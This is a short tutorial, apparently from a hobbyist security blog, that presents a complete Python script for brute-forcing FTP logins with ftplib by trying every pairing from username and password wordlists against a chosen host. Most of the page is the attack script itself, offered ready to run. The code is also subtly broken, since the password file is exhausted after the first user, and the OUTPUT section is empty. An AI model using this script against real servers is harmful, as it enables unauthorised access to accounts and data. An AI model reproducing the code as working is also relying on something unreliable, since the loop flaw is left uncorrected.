The article will guide you on how to bruteforce FTP using ftplib library in python. I have already posted an article on how to check for anonymous FTP script. FTP is File transfer protocol which is used to upload/download files from server to client. It works on Port 21. FTPLIB provides many features to python to connect and handle FTP connections.

Explanation:

The code is pretty forward. We will import the ftplib library and sys to use arguments

def logfile(target,users,passw): This function works for the user and password files. It opens them and passes them to the function bruteftp.

def bruteftp(target,users,passw): This function takes the input sent by the logfile() function and remove the carriage return and newline from the user and password which came directly from the file using *.strip(‘\r’).strip(‘\n’). Once removed, it passes the new stripped user and password to the ftp.login() to check if they are correct.

CODE:

#!/usr/bin/python3
import ftplib
import sys

def logfile(target,users,passw):
	try:
		ufile=open(users,'r')
		pfile=open(passw,'r')
		for user in ufile.readlines():
			for password in pfile.readlines():
				bruteftp(target,user,password)
	except Exception as e:
		print(e)


def bruteftp(target,users,passw):
	try:
		ftp=ftplib.FTP(target)
		user=users.strip('\r').strip('\n')
		password=passw.strip('\r').strip('\n')
		print('Trying with: '+user+" "+password)
		ftp.login(user,password)
		ftp.quit()
		print('Login succeeded with: '+user+" "+password)
		return(user,passw)
	except Exception as e:
		print("Incorrect credentials.")
		return(None,None)

if len(sys.argv) !=4:
	print("Not enough arguments:\n"+\
	'Usage: ftpc.py target userfile passfile')
else:
	host=sys.argv[1]
	users=sys.argv[2]
	passw=sys.argv[3]
	logfile(host,users,passw)

OUTPUT: